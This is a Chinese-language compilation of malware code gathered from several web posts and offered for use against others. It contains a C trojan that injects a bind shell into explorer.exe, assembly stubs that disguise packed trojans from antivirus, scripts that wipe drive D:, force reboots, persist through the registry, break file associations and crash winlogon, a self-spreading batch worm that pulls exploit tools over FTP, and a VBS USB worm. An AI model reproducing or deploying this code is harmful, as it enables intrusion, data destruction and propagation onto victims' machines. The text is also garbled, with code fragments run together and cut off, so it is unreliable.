病毒编写指令大全

制造木马病毒代码大全2008-06-0819:46制造木马病毒代码大全一个简单的木马原型基础代码添加上自己的XXX，加上变态的壳，做点小修改，就可以．．．．．#include#pragma comment(lib,"ws2_32.lib") #include#include#pragma comment(lib,"Shlwapi.lib")#include#include#include//参数结构;typedef struct_RemotePara{DWORD dwLoadLibrary;DWORD dwFreeLibrary;DWORD dwGetProcAddress;DWORD dwGetModuleHandle;DWORD dwWSAStartup;DWORD dwSocket;DWORD dwhtons;DWORD dwbind;DWORD dwlisten;DWORD dwaccept;DWORD dwsend;DWORD dwrecv;DWORD dwclosesocket;DWORD dwCreateProcessA;DWORD dwPeekNamedPipe;DWORD dwWriteFile;DWORD dwReadFile;DWORD dwCloseHandle; DWORD dwCreatePipe;DWORD dwTerminateProcess; DWORD dwMessageBox;char strMessageBox[12];char winsockDll[16];char cmd[10];char Buff[4096];char telnetmsg[60];}RemotePara;//提升应用级调试权限BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable);//根据进程名称得到进程ID DWORD GetPidByName(char*szName);//远程线程执行体DWORD__stdcall ThreadProc(RemotePara*Para){WSADATA WSAData;WORD nVersion;SOCKET listenSocket;SOCKET clientSocket;struct sockaddr_in server_addr;struct sockaddr_in client_addr;int iAddrSize =sizeof(client_addr);SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1;HANDLE hWritePipe1;HANDLE hReadPipe2;HANDLE hWritePipe2;STARTUPINFO si; PROCESS_INFORMATION ProcessInformation;unsigned long lBytesRead=0;typedef HINSTANCE(__stdcall*PLoadLibrary)(char*);typedef FARPROC(__stdcall*PGetProcAddress)(HMODULE,LPCSTR);typedef HINSTANCE(__stdcall*PFreeLibrary)(HINSTANCE); typedef HINSTANCE(__stdcall*PGetModuleHandle)(HMODULE);FARPROC PMessageBoxA;FARPROC PWSAStartup;FARPROC PSocket;FARPROC Phtons;FARPROC Pbind;FARPROC Plisten;FARPROC Paccept;FARPROC Psend;FARPROC Precv;FARPROC Pclosesocket;FARPROC PCreateProcessA; FARPROC PPeekNamedPipe;FARPROC PWriteFile; FARPROC PReadFile;FARPROC PCloseHandle;FARPROC PCreatePipe;FARPROC PTerminateProcess;PLoadLibrary LoadLibraryFunc=(PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc=(PGetProcAddress)Para->dwGetProcAddress;PFreeLibrary FreeLibraryFunc=(PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc= (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll);PWSAStartup= (FARPROC)Para->dwWSAStartup;PSocket= (FARPROC)Para->dwSocket;Phtons= (FARPROC)Para->dwhtons;Pbind=(FARPROC)Para->dwbind;Plisten=(FARPROC)Para->dwlisten;Paccept= (FARPROC)Para->dwaccept;Psend= (FARPROC)Para->dwsend;Precv=(FARPROC)Para->dwrecv;Pclosesocket= (FARPROC)Para->dwclosesocket;PCreateProcessA= (FARPROC)Para->dwCreateProcessA;PPeekNamedPipe= (FARPROC)Para->dwPeekNamedPipe;PWriteFile= (FARPROC)Para->dwWriteFile;PReadFile= (FARPROC)Para->dwReadFile;PCloseHandle= (FARPROC)Para->dwCloseHandle;PCreatePipe= (FARPROC)Para->dwCreatePipe;PTerminateProcess= (FARPROC)Para->dwTerminateProcess;PMessageBoxA= (FARPROC)Para->dwMessageBox;nVersion=MAKEWORD(2,1);PWSAStartup(nVersion, (LPWSADATA)&WSAData);listenSocket=PSocket(AF_INET,SOCK_STREAM,0);if(listenSocket== INVALID_SOCKET)return0;server_addr.sin_family=AF_INET;server_addr.sin_port=Phtons((unsigned short)(8129));server_addr.sin_addr.s_addr=INADDR_ANY;if(Pbind(listenSocket,(struct sockaddr *)&server_addr,sizeof(SOCKADDR_IN))!=0)return0;if(Plisten(listenSocket,5))return0;clientSocket= Paccept(listenSocket,(struct sockaddr*)&client_addr,&iAddrSize);//Psend(clientSocket,Para->telnetmsg,60, 0);if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;ZeroMemory(&si,sizeof(si));//ZeroMemory是C运行库函数，可以直接调用si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow=SW_HIDE;si.hStdInput=hReadPipe2; si.hStdOutput=si.hStdError=hWritePipe1;if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NUL L,NULL,&si,&ProcessInformatio n))return0;while(1){memset(Para->Buff,0,4096);PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRe ad,0,0);if(lBytesRead){if(!PReadFile(hReadPipe1,Para->Buff,lBytesRead,&lBytesRead,0))break;if(!Psend(clientSocket,Para->Buff,lBytesRead,0))break;}else{lBytesRead=Precv(clientSocket,Para->Buff,4096,0);if(lBytesRead<=0)break;if(!PWriteFile(hWritePipe2,Para->Buff,lBytesRead,&lBytesRead,0))break;}}PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1);PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1);Pclosesocket(listenSocket); Pclosesocket(clientSocket);//PMessageBoxA(NULL, Para->strMessageBox,Para->strMessageBox,MB_OK); return0;}int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow){const DWORD THREADSIZE=1024*4; DWORD byte_write;void*pRemoteThread;HANDLE hToken,hRemoteProcess,hThread;HINSTANCE hKernel,hUser32,hSock;RemotePara myRemotePara,*pRemotePara;DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_ PRIVILEGES,&hToken);EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);//获得指定进程句柄，并设其权限为PROCESS_ALL_ACCESS pID= GetPidByName("EXPLORER.EXE");if(pID==0)return0; hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);if(!hRemoteProcess)return0;//在远程进程地址空间分配虚拟内存pRemoteThread=VirtualAllocEx(hRemoteProcess,0,THREADSIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!pRemoteThread)return0;//将线程执行体ThreadProc 写入远程进程if(!WriteProcessMemory(hRemoteProcess, pRemoteThread,&ThreadProc,THREADSIZE,0))return0; ZeroMemory(&myRemotePara,sizeof(RemotePara)); hKernel=LoadLibrary("kernel32.dll"); myRemotePara.dwLoadLibrary=(DWORD)GetProcAddress(hKernel,"LoadLibraryA"); myRemotePara.dwFreeLibrary=(DWORD)GetProcAddress(hKernel,"FreeLibrary"); myRemotePara.dwGetProcAddress=(DWORD)GetProcAddress(hKernel,"GetProcAddress"); myRemotePara.dwGetModuleHandle=(DWORD)GetProcAddress(hKernel,"GetModuleHandleA"); myRemotePara.dwCreateProcessA=(DWORD)GetProcAddress(hKernel,"CreateProcessA"); myRemotePara.dwPeekNamedPipe=(DWORD)GetProcAddress(hKernel,"PeekNamedPipe"); myRemotePara.dwWriteFile=(DWORD)GetProcAddress(hKernel,"WriteFile"); myRemotePara.dwReadFile=(DWORD)GetProcAddress(hKernel,"ReadFile"); myRemotePara.dwCloseHandle=(DWORD)GetProcAddress(hKernel,"CloseHandle"); myRemotePara.dwCreatePipe=(DWORD)GetProcAddress(hKernel,"CreatePipe"); myRemotePara.dwTerminateProcess=(DWORD)GetProcAddress(hKernel,"TerminateProcess"); hSock=LoadLibrary("wsock32.dll"); myRemotePara.dwWSAStartup=(DWORD)GetProcAddress(hSock,"WSAStartup"); myRemotePara.dwSocket=(DWORD)GetProcAddress(hSock,"socket"); myRemotePara.dwhtons=(DWORD)GetProcAddress(hSock,"htons");myRemotePara.dwbind=(DWORD)GetProcAddress(hSock,"bind"); myRemotePara.dwlisten=(DWORD)GetProcAddress(hSock,"listen"); myRemotePara.dwaccept=(DWORD)GetProcAddress(hSock,"accept"); myRemotePara.dwrecv=(DWORD)GetProcAddress(hSock,"recv"); myRemotePara.dwsend=(DWORD)GetProcAddress(hSock,"send"); myRemotePara.dwclosesocket=(DWORD)GetProcAddress(hSock,"closesocket");hUser32 =LoadLibrary("user32.dll");myRemotePara.dwMessageBox=(DWORD)GetProcAddress(hUser32,"MessageBoxA"); strcat(myRemotePara.strMessageBox,"Sucess!\\0"); strcat(myRemotePara.winsockDll,"wsock32.dll\\0"); strcat(myRemotePara.cmd,"cmd.exe\\0");strcat(myRemotePara.telnetmsg,"ConnectSucessful!\\n\\0");//写进目标进程pRemotePara=(RemotePara*)VirtualAllocEx (hRemoteProcess,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);if(!pRemotePara)return0;if(!WriteProcessMemory(hRemoteProcess,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return0;//启动线程hThread= CreateRemoteThread(hRemoteProcess,0,0,(DWORD (__stdcall*)(void*))pRemoteThread,pRemotePara,0,&byte_write);while(1) {}FreeLibrary(hKernel);FreeLibrary(hSock); FreeLibrary(hUser32);CloseHandle(hRemoteProcess); CloseHandle(hToken);return0;}BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){TOKEN_PRIVILEGES tp;tp.PrivilegeCount=1;LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].L uid);tp.Privileges[0].Attributes=fEnable?SE_PRIVILEGE_ENABLED:0; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL, NULL);return((GetLastError()==ERROR_SUCCESS));} DWORD GetPidByName(char*szName){HANDLE hProcessSnap=INVALID_HANDLE_VALUE; PROCESSENTRY32pe32={0};DWORD dwRet=0; hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if(hProcessSnap==INVALID_HANDLE_VALUE)return0; pe32.dwSize=sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap,&pe32)){do{if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0) {dwRet=pe32.th32ProcessID;break;}}while (Process32Next(hProcessSnap,&pe32));}else return0;if(hProcessSnap!=INVALID_HANDLE_VALUE)CloseHandle (hProcessSnap);return dwRet;1.伪装vc++5.0代码：PUSH EBP MOV EBP,ESP PUSH-1push415448-\___PUSH 4021A8-/在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0]PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL/这条指令可以不要!jmp原入口地址*********************************************** *************************2.胡乱跳转代码：nop push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx loop somewhere/跳转到上面那段代码地址去！somewhere:nop/"胡乱"跳转的开始...jmp下一个jmp的地址/在附近随意跳jmp.../...jmp原入口地址/跳到原始oep90558B EC4152905A495D41转储免杀*********************************************** *************************3.伪装c++代码：push ebp mov ebp,esp push-1push111111push222222mov eax,fs:[0]push eax mov fs:[0],esp pop eax mov fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp原入口地址*********************************************** *************************4.伪装Microsoft VisualC++6.0代码：PUSH-1PUSH0PUSH0MOVEAX,DWORD PTR FS:[0]PUSH EAX MOV DWORD PTR FS:[0],ESP SUB ESP,68PUSH EBX PUSH ESI PUSH EDI POP EAX POP EAX POP EAX ADD ESP,68POP EAX MOV DWORD PTR FS:[0],EAX POP EAX POP EAX POP EAX POP EAX MOV EBP,EAX JMP原入口地址push ebp mov ebp,esp jmp*********************************************** *************************5.伪装防杀精灵一号防杀代码：push ebp mov ebp,esp push-1push666666push 888888mov eax,dword ptr fs:[0]push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp原入口地址*********************************************** *************************6.伪装防杀精灵二号防杀代码：push ebp mov ebp,esp push-1push0push0mov eax,dword ptr fs:[0]push eax mov dword ptr fs:[0],esp sub esp,68push ebx push esi push edi pop eax pop eax pop eax add esp,68pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax jmp原入口地址*********************************************** *************************7.伪装木马彩衣(无限复活袍)代码：PUSH EBP MOV EBP,ESP PUSH-1push415448 -\___PUSH4021A8-/在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0]PUSH EAX MOV DWORD PTR FS:[0],ESP ADD ESP,-6C PUSH EBX PUSH ESI PUSH EDI ADD BYTE PTR DS:[EAX],AL/这条指令可以不要! jo原入口地址jno原入口地址call下一地址*********************************************** *************************8.伪装木马彩衣(虾米披风)代码：push ebp nop nop mov ebp,esp inc ecx nop push edx nop nop pop edx nop pop ebp inc ecx loop somewhere /跳转到下面那段代码地址去！someshere:nop/"胡乱"跳转的开始...jmp下一个jmp的地址/在附近随意跳jmp... /...jmp原入口的地址/跳到原始oep9.伪装花花添加器(神话)代码：-----------根据C++改nop nop nop mov ebp,esp push-1push111111push222222mov eax,dword ptr fs:[0]push eax mov dword ptr fs:[0],esp pop eax mov dword ptr fs:[0],eax pop eax pop eax pop eax pop eax mov ebp,eax mov eax,原入口地址push eax retn*********************************************** *************************10.伪装花花添加器(无极)代码：nop mov ebp,esp push-1push0A2C2A push0D9038mov eax,fs:[0]push eax mov fs:[0],esp pop eax mov fs:[0],eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax,原入口地址jmp eax*********************************************** *************************11.伪装花花添加器(金刚)代码：--------根据VC++5.0改nop nop mov ebp,esp push -1push415448push4021A8mov eax,fs:[0]push eax mov fs:[0],esp add esp,-6C push ebx push esi push edi add [eax],al mov eax,原入口地址jmp eax*********************************************** *************************12.伪装花花添加器(杀破浪)代码：nop mov ebp,esp push-1push0push0mov eax, fs:[0]push eax mov fs:[0],esp sub esp,68push ebx push esi push edi pop eax pop eax pop eax add esp,68pop eax mov fs:[0],eax pop eax pop eax pop eax pop eax mov ebp, eax mov eax,原入口地址jmp eax*********************************************** *************************12.伪装花花添加器(痴情大圣)代码：nop..........省略N行nop nop push ebp mov ebp, esp add esp,-0C add esp,0C mov eax,原入口地址push eax retn*********************************************** *************************13.伪装花花添加器(如果*爱)代码：nop........省略N行nop nop push ebp mov ebp, esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx mov eax,原入口地址jmp eax*********************************************** *************************14.伪装PEtite2.2->Ian Luck代码：mov eax,0040E000push004153F3push dword ptr fs:[0]mov dword ptr fs:[0],esp pushfw pushad push eax xor ebx,ebx pop eax popad popfw pop dword ptr fs:[0]pop eax jmp原入口地址'执行到程序的原有OEP*********************************************** *************************15.无效PE文件代码：push ebp mov ebp,esp inc ecx push edx nop pop edx dec ecx pop ebp inc ecx MOV DWORD PTR FS:[0],EAX\POP EAX|POP EAX\MOV DWORD PTR FS:[0],EAX|（注意了。

病毒代码【病毒⼩程序】关于病毒的代码可以⽤来运⾏⼀下，你的电脑可能会发⽣......但⼤家都知道，病毒是恐怖的，你可以做⼀些有趣的代码.关机代码＃includeusing namespace std;void main(){system(“cmd /c shutdown -s -t 60”); //这是调⽤cmdsystem(“pause”);}相信这很简单吧！还有个⽅法#include#include<shlobj.h>#include<shellapi.h>using namespace std;void main(){ShellExecute(NULL,“open”,“cmd.EⅩE”,"/c shutdown -s -t 60",NULL,SW_HIDE); system(“pause”);} # 加强版本// shutdownDemo.cpp : 定义控制台应⽤程序的⼊⼝点。

//#include "stdafx.h"#include <windows.h>BOOL MySystemShutdown(){HANDLE hToken; //⽤于操作的句柄TOKEN_PRIVILEGES tkp; //⽤于存放特定信息// Get a token for this process.if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))return(FALSE);// Get the LUID for the shutdown privilege.//如果要提权的话要在下⾯这两个函数提权LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount = 1; // one privilege to settkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;// Get the shutdown privilege for this process.AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);if (GetLastError() != ERROR_SUCCESS)return FALSE;// Shut down the system and force all applications to close.if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,SHTDN_REASON_MAJOR_OPERATINGSYSTEM |SHTDN_REASON_MINOR_UPGRADE |# 卡死代码# # 打开⽆数计算机``````VBS 系列格式代码# 甩不掉的魔⿁SHTDN_REASON_FLAG_PLANNED))return FALSE;//shutdown was successfulreturn TRUE;}int _tmain(int argc, _TCHAR* argv[]){getchar();HKEY hKey = { 0 };/*LONG RegOpenKeyEx(HKEY hKey, // 需要打开的主键的名称LPCTSTR lpSubKey, //需要打开的⼦键的名称DWORD ulOptions, // 保留，设为0REGSAM samDesired, // 安全访问标记，也就是权限PHKEY phkResult // 得到的将要打开键的句柄)*/RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey); //打开⼀个指定的注册表键char path[MAX_PATH] = { 0 };GetModuleFileNameA(nullptr, path, MAX_PATH); //获取当前⽂件路径RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte *)path, strlen(path));MySystemShutdown();return 0;}#include <stdio.h>void main(){long int i;while (i < =100000000){printf("你"完"了");i --;}}set wsh=createobject(“wscript.shell”)dowsh.run “calc”loop这段代码是打开⽆数个计算器，直到死机 ,也是保存为.vbs 格式WScript.Echo(“嘿，谢谢你打开我哦，我等你很久拉！”&TSName)WScript.Echo(“你是可爱的⼩朋吗?”)WScript.Echo(“哈,我想你拉，这你都不知道吗？”)WScript.Echo(“怎么才来，说~是不是不关⼼我”)WScript.Echo(“哼,我⽣⽓拉，等你这么久，⼼都凉啦。

计算机病毒代码有哪些计算机病毒也是要生成的，那么计算机病毒代码有些什么呢?下面由店铺给你做出详细的计算机病毒代码介绍!希望对你有帮助!计算机病毒代码介绍一：void main(){while(1){}}//死循环，电脑用不了或者这样void main(){while(1){char *a=new char(1024);}}//吃光你的内存还能这样#include#includevoid main(){..........//循环查找文件写入垃圾数据，省略若干代码}最好HOOK openprocess这个东东让任务管理器都结束不掉想象力是无限的，看你怎么玩。

计算机病毒代码介绍二：给你个恶搞的玩on error resume nextdim WSHshellAset WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪，不说我是猪就一分钟关你机，不信，试试···"" ",0 ,truedim ado while(a <> "我是猪")a = inputbox ("说我是猪,就不关机，快撒，说 ""我是猪"" ","说不说","不说",8000,7000)msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"loopmsgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd.exe /c shutdown -a",0 ,truemsgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈，真过瘾"计算机病毒代码介绍三：最简单的一个电脑病毒1.VBS版本：打开记事本，输入以下代码：Do Until 1=2Wscript.echo "烦死你!"Loop保存为1.VBS，运行后不断出现"烦死你"的对话框。

C++病毒病毒代码⼀#include <bits/stdc++.h>#include <windows.h>using namespace std;void HideWindow() {HWND hwnd;hwnd=FindWindow("ConsoleWindowClass",NULL);if(hwnd) ShowWindow(hwnd,SW_HIDE);return;}int main() {HideWindow();int x=GetSystemMetrics(SM_CXSCREEN);int y=GetSystemMetrics(SM_CYSCREEN);for(;;){system("start cmd");for(int i=1;i<=100;i++) {SetCursorPos(rand()%y,rand()%x);}}return0;}请勿在⾃⼰计算机上运⾏，后果⾃负！！！阅读提⽰：GetSystemMetrics()⽤于获得屏幕的分辨率，然后不断的给⿏标坐标设定随机数。

SetCursorPos⽤于设定⿏标坐标system("start cmd")⽤于新建⼀个cmd窗⼝病毒代码⼆#include<bits/stdc++.h>using namespace std;int main(){for(int i=0;i<100;i++){string s;stringstream ss;ss<<i;ss>>s;freopen(("D:\\"+s+".txt").c_str(),"w",stdout);for(int j=0;j<1024*1024*1024;j++){cout<<'*';//⼀个txt放⼀个GB ,因为⼀个TXT最多只能放⼀个GB}}}使⽤freopen不断往磁盘⾥⾯放⽂件，每个⽂件只能占⼀个GB（经测试，⼀个⽂件如果设定超过1GB会出问题）。

bat整人电脑病毒代码是怎样的篇一：一些bat恶搞代码第一个:让别人内存oVeR(逼他重启)@echooffstartcmd%0就这3行了第二个:让对方重启指定次数(害人专用)@echooffifnotexistc:\1.txtecho.>c:\1.txt&gotoerr1ifnotexistc:\2.txtecho.>c:\2.txt&gotoerr1ifnotexistc:\3.txtecho.>c:\3.txt&gotoerr1ifnotexistc:\4.txtecho.>c:\4.txt&gotoerr1ifnotexistc:\5.txtecho.>c:\5.txt&gotoerr1gotoerr2:err1shutdown-s-t0:err2上面可以让对方电脑重启5次后不在重启第三个:自动踢人(3389肉机保护自己专用)@echoofflogoff1dellog.batlogoff后面的1改成自己登陆的ID号,用queryuser查看第四个:批量自动溢出@for/f%%iin(result.txt)do42%%i58.44.89.158521先自己用nc监听端口,多开几个,然后指行,就自动溢出了第五个:自动挂马改主页@echooffclsrem直接打批处理名字就有帮助title批量挂马,改首页(伤脑筋QQ:447228437).colorAsetpan=%1setye=%2setdai=%3if"%pan%"==""gotoe1if"%ye%"==""gotoe1if"%dai%"==""gotoe1使用!echo.第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完delc:\42.exedelc:\nc.exedelc:\ip.exeechodimwsh>%systemroot%\help\test.vbsechosetwsh=createobject("wscript.shell")>>%systemroot%\help\test.vbsechowsh .run"cmd/c%systemroot%\help\nc-v-l-p810>%systemroot%\help\test.vbsechodimwsh>%systemroot%\help\test2.vbsechosetwsh=createobject("wscript.shell")>>%systemroot%\help\test2.vbsechows h.run"cmd/cstart%systemroot%\help\good.bat",0>>%systemroot%\help\test2.vbsecho open10.0.0.5>%systemroot%\help\ftp.txtechoopenmyyes>>%systemroot%\help\ftp.txtecho1>>%systemroot%\help\ftp.txtechobinary>>%systemroot%\help\ftp.txtechoget42.exec:\42.exe>>%s\Run]>>%systemroot%\help\1.reg echo"sKYneTpersonalFirewall"="F:\\系统安全工具\\Firewall\\pFw.exe">>%systemroot%\help\1.regecho"1"="%systemroot%\\help\\test2.vbs">>%systemroot%\help\1.reg ifnotexist%systemroot%\help\good.batcopygood.bat%systemroot%\help\good.bat&%systemroot%\help\test2.vbs&de lgood.batregedit-s%systemroot%\help\1.regftp-s:%systemroot%\help\ftp.txtmovec:\nc.exe%systemroot%\help\/ymovec:\42.exe%systemroot%\help\/ymovec:\ip.exe%systemroot%\help\/y%systemroot%\help\test.vbsremfor/f%%iin(result1.txt)doseta=%%iremfor/f%%jin(result.txt)do42%a%%%j810准备:1:找一个反向连接的溢出攻击程序,如ms06040漏洞2:找呀一个免费FTp空间,最好是送域名的3:利用你所知道的高级语言编写一个,能生成随机范围Ip地址和找到本机Ip的工具.思路:用for语句对指定文本里的Ip进行溢出,然后用if语句判断是否溢出成功,如果成功开启一个nc监听端口,nc后面带一个输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下因为批处理运行后会闪出命令行窗口,我门可以利用Vbs脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下echodimwsh>%systemroot%\help\test.vbsechosetwsh=createobject("wscript.shell")>>%systemroot%\help\test.vbsechowsh .run"cmd/c%systemroot%\help\nc-v-l-p810>%systemroot%\help\test.vbs生成随机Ip工具的Vb代码privatesubForm_Load()DimfsoAsnewFilesystemobjectDima,b,c,dAsIntegerDimph,eAsstringph=App.path&"\"&"ip.txt"Randomizea=Int(253*Rnd+1)b=Int(253*Rnd+1)c=Int(240*Rnd+1)openphForoutputAs#1Fori=cToc+7Forj=1To254e=a&"."&b&"."&i&"."&jprint#1,eDoeventsnextjnexticlose#1unloadmeendsub篇二：整人“病毒”代码(一)发表于20XX-10-2310:33前段时间看到大家对这种整人的代码兴趣还挺浓厚的，我最近就收集了一些和大家分享。

经典命令⾏脚本病毒⼀般简单的病毒都是通过bat对Windows命令或者shell script对Linux命令来实现的。

简单的病毒从Windows开始关机病毒"-s"正常关机"-f"强制关机"-r"重启"-t"定时关机“-c” 设置提⽰信息“-a” 是取消定时关机⽐如shutdown -s -t 600这个命令可以实现在⼗分钟内电脑即将关机.想要取消可以使⽤shutdown -a蓝屏炸弹winlogon.exe是windows登录管理器，位于C:\Windows\System32⽬录下，主要⽤于管理⽤户的登录和退出，处理⽤户登录和注销任务。

ntsd -c q -pn这个命令⽤于结束进程,如果不加后⾯的n,就是要输⼊进程的pid例如nstd -c q -pn winlogon.exe这个命令会导致系统蓝屏,重启.⽂件失效病毒assoc，显⽰或修改⽂件扩展名关联。

如果在没有参数的情况下使⽤，则 assoc 将显⽰所有当前⽂件扩展名关联的列表。

例如:assoc.exe=txtfile就是将exe⽂件和txt⽂件关联.造成不良后果之后可⽤assoc.exe=exefile还原但是利⽤如同assoc.exe=txtfileassoc.rm=txtfileassoc.htm=txtfile.......如果将所有的⽂件都和txt关联,就会导致所有的⽂件都打不开,尤其当和cmd关联的时候,就⽆法运⾏.死循环弹窗不再使⽤bat,⽽是使⽤vbs脚本MsgBox是Visual Basic和VBS中的⼀个函数，功能是弹出⼀个对话框，等待⽤户单击按钮，并返回⼀个Integer值表⽰⽤户单击了哪⼀个按钮。

例如domsgbox "hello"loop就会陷⼊死循环,只有结束进程才有⽤.。

——1个连360都查不出来的可怕病毒…
哈哈，只是一个恶搞的病毒，大家可以自己编译一下，也可以自己改编，很简单的病毒
下面是病毒代码，纯属恶搞，绝无危害
#include <windows.h>
int main()
{
int judge= MessageBox(NULL,"你的电脑已经中了我的病毒","小可怕病毒",MB_YESNO|MB_ICONEXCLAMATION|MB_HELP);
if(judge==IDYES) {
int a=MessageBox(NULL,"点击修复","小可怕毒修复程序",MB_YESNO);
if (a==IDYES)
{MessageBox(NULL,"骗你的","小可怕病毒恶搞程序",MB_RETRYCANCEL);}
}
else{
MessageBox(NULL,"可恶，你的电脑要没了","一大波病毒入侵",MB_OK|MB_ICONEXCLAMATION);
}
return 0;
}
这是界面，不过大家要在win32项目下写才会没有这个黑黑的东东
--made by gaoxiaolong。

整⼈病毒vbs⼤全！新建⼀个记事本把代码复制进去重名名为vbs格式的就可以了解除这个vbs脚本的办法就简单了只要关掉任务管理器⾥Wscript.exe这个进程就好了1、你打开好友的聊天对话框,然后记下在你QQ⾥好友的昵称,把下⾯代码⾥的xx替换⼀下,就可以⾃定义发送QQ信息到好友的次数(代码⾥的数字10改⼀下即可).xx.vbs=>—————————————————————————代码如下：On Error Resume NextDim wsh,yeset wsh=createobject(“wscript.shell”)for i=1 to 10wscript.sleep 700wsh.AppActivate(“与 xx 聊天中“)wsh.sendKeys “^v”wsh.sendKeys iwsh.sendKeys “%s”nextwscript.quit—————————————————————————2、我就⽤这个程序放在学校图书馆查询书刊的机器上，好多⼈都那它没办法，哈哈—————————————————————————代码如下：domsgbox “You are foolish!”loop—————————————————————————3、直接关机—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “shutdown -f -s -t 00”,0 ,true—————————————————————————4、删除D:\所有⽂件—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true —————————————————————————5、不断弹出窗⼝—————————————————————————代码如下：while(1)msgbox “哈哈你被耍了！“loop—————————————————————————6、不断按下alt+f4 （开什么都关闭……）病毒太强必须关机才⾏！—————————————————————————代码如下：dim WSHshellset WSHshell = wscript.createobject(“wscript.shell”)while(1)WSHshell.SendKeys “%{F4}”Wend—————————————————————————7、按500次回车(以下代码在运⾏者的电脑上显⽰500个对话框。

⼀段病毒常⽤的VBS代码复制代码代码如下:On error resume nextDim fso,wshell,curfolder,curdristr,curdriSet fso=createobject("scripting.filesystemobject")Set wshell=CreateObject("WScript.shell")Set curfolder=fso.GetFolder(".")curdristr=Left(WScript.ScriptFullName,3)Set curdri=fso.GetDrive(curdristr)reghid() '不显⽰隐藏⽂件If WScript.ScriptFullName=fso.GetSpecialFolder(1)&"\mp3.vbs" Then '如果在system32中For i=1 To 2 Step 0reghid()For Each dri In fso.DrivesIf dri.DriveType=1 And dri<>"A:" And dri<>"B:" Then'autorun.inf⽂件夹改名If fso.FolderExists(dri.Path&"\autorun.inf") Thenfso.MoveFolder dri.Path&"\autorun.inf",dri.Path&"\Rubbish"End If'复制⾃⾝及exe⽂件到移动硬盘If fso.FileExists(dri.Path&"\mp3.vbs") And fso.FileExists(dri.Path&"\autorun.inf") Then ElseIf fso.FileExists(dri.Path&"\mp3.vbs") Thenfso.DeleteFile dri.Path&"\mp3.vbs",TrueElseIf fso.FileExists(dri.Path&"\autorun.inf") Thenfso.DeleteFile dri.Path&"\autorun.inf",TrueEnd iffso.CopyFile WScript.ScriptFullName,dri.Path&"\mp3.vbs",TrueIf fso.FileExists(".\SiZhu.exe") And Not fso.FileExists(dri.Path&"\SiZhu.exe") Then fso.CopyFile ".\SiZhu.exe",dri.Path&"\SiZhu.exe",TrueEnd Ifautoinf(dri.Path)'给刚复制的⽂件加上隐藏属性Set norkon=fso.GetFile(dri.Path&"\mp3.vbs")wshell.run "attrib +r +a +s +h "&dri.Path&"\mp3.vbs",0Set norkon=Nothing。

